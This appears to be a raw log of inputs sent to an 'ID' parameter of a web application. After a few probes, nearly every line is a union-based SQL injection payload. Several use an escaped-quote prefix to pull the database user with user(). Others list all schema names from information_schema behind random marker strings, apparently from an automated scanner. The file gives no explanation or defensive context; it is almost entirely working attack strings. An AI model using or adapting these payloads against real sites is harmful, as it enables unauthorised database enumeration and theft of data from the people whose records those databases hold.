ID:1
ID:a
ID:\"
ID:-1ß\' union select 1,2,user()
ID:-1ß\' union select 1,2,user()--
ID:-1ß\' union select 1,user(),2 or \'1
ID:-1ß\' union select 1,user(),2-- 
ID:-1ß\' union select 1,user(),2--
ID:-1ß\' union select 1,user(),2-- 
ID:-1ß\' union select 1,user(),2-- 
ID:-1 union select 1,2,concat(\'schemas:\',group_concat(schema_name)) from information_schema.schemata -- 
ID:-1 union select 1,2,concat(\'OsMJJKjkhs:\',group_concat(schema_name)) from information_schema.schemata -- 
ID:-1 union select 1,2,concat(\'EBA8YbJJtv:\',group_concat(schema_name)) from information_schema.schemata -- 
ID:-1 union select 1,2,concat(\'jrZ7Ls8Ssi:\',group_concat(schema_name)) from information_schema.schemata -- 
ID:-1 union select 1,2,concat(\'xOxntoNYua:\',group_concat(schema_name)) from information_schema.schemata -- 
ID:-1 union select 1,2,concat(\'ZWw8ZQc4BN:\',group_concat(schema_name)) from information_schema.schemata -- 
